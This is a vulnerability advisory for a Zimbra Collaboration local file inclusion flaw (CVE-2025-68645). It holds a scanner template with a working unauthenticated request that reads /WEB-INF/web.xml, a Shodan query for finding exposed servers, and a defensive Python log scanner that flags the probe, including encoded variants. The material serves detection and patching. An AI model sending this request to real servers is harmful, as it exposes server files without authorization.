Zimbra Collaboration (ZCS) 10.0 and 10.1 contain a local file inclusion vulnerability caused by improper handling of user-supplied parameters in the RestFilter servlet. It lets unauthenticated remote attackers include arbitrary files from the WebRoot; exploitation requires crafted requests to the /h/rest endpoint.
PoC code [publicly available]
id: CVE-2025-68645

info:
  name: Zimbra Collaboration - Local File Inclusion
  author: DhiyaneshDk,sirifu4k1
  severity: high
  description: |
    Zimbra Collaboration (ZCS) 10.0 and 10.1 contain a local file inclusion caused by improper handling of user-supplied parameters in the RestFilter servlet, letting unauthenticated remote attackers include arbitrary files from WebRoot, exploit requires crafted requests to /h/rest endpoint.
  impact: |
    Unauthenticated remote attackers can include arbitrary files from the WebRoot directory, potentially exposing sensitive information.
  remediation: |
    Update to the latest version of Zimbra Collaboration.
  reference:
    - https://x.com/sirifu4k1/status/2006031417088639064
  metadata:
    max-request: 1
    verified: true
    shodan-query: http.title:"Zimbra Collaboration Suite"
  tags: cve,cve2025,zimbra,zcs,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<?xml version"
          - "web-app>"
          - "Zimbra"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022052e3300505df920b00aad5ca8c9b3f98e0f844707396e89a94f97a7a14fb2d53022051009d609de1711aef811f75527300151a53f3595f0d013d2e1936b08896f7d0:922c64590222798bb761d5b6d8e72950
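For defenders, the request pattern in the template above is also the detection signal: a client should never be sending servlet-container include attributes such as javax.servlet.include.servlet_path as query parameters to /h/rest. The following script is an added example, not part of the template or the advisory; it scans Common Log Format access-log lines (the sample entries and client addresses are constructed) and flags requests matching that pattern, URL-decoding first so percent-encoded variants are not missed.

```python
# Added example: flag access-log entries matching the CVE-2025-68645 probe
# pattern (requests to /h/rest carrying javax.servlet.include.* attributes as
# query parameters). Log format and sample lines below are constructed.
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Common Log Format: client ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Request-dispatcher attribute names used by RequestDispatcher.include();
# a legitimate client has no reason to supply any of them in a query string.
SUSPICIOUS_PARAMS = (
    "javax.servlet.include.servlet_path",
    "javax.servlet.include.path_info",
    "javax.servlet.include.request_uri",
)

def is_lfi_probe(target: str) -> bool:
    """True if the request target hits /h/rest with an include attribute in
    the query string. Decoded once so %2E / %2F encodings are caught too."""
    url = urlsplit(unquote(target))
    if not url.path.startswith("/h/rest"):
        return False
    params = parse_qs(url.query, keep_blank_values=True)
    return any(p in params for p in SUSPICIOUS_PARAMS)

def scan_log(lines):
    """Return (client, target, status) for every matching request line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_lfi_probe(m["target"]):
            hits.append((m["client"], m["target"], int(m["status"])))
    return hits

SAMPLE_LOG = [  # constructed entries; IPs are documentation ranges
    '203.0.113.7 - - [02/Jan/2026:10:00:01 +0000] "GET /h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml HTTP/1.1" 200 4512',
    '198.51.100.4 - - [02/Jan/2026:10:00:02 +0000] "GET /h/rest?javax%2Eservlet%2Einclude%2Eservlet_path=%2FWEB-INF%2Fweb.xml HTTP/1.1" 200 4512',
    '192.0.2.9 - - [02/Jan/2026:10:00:03 +0000] "GET /h/rest?fmt=json HTTP/1.1" 200 88',
    '192.0.2.9 - - [02/Jan/2026:10:00:04 +0000] "GET /service/soap HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for client, target, status in scan_log(SAMPLE_LOG):
        print(f"{client} {status} {target}")
```

A 200 status on a flagged line is the stronger signal, since the template's matcher treats a 200 with web.xml content as a confirmed hit; a patched host should not return the file.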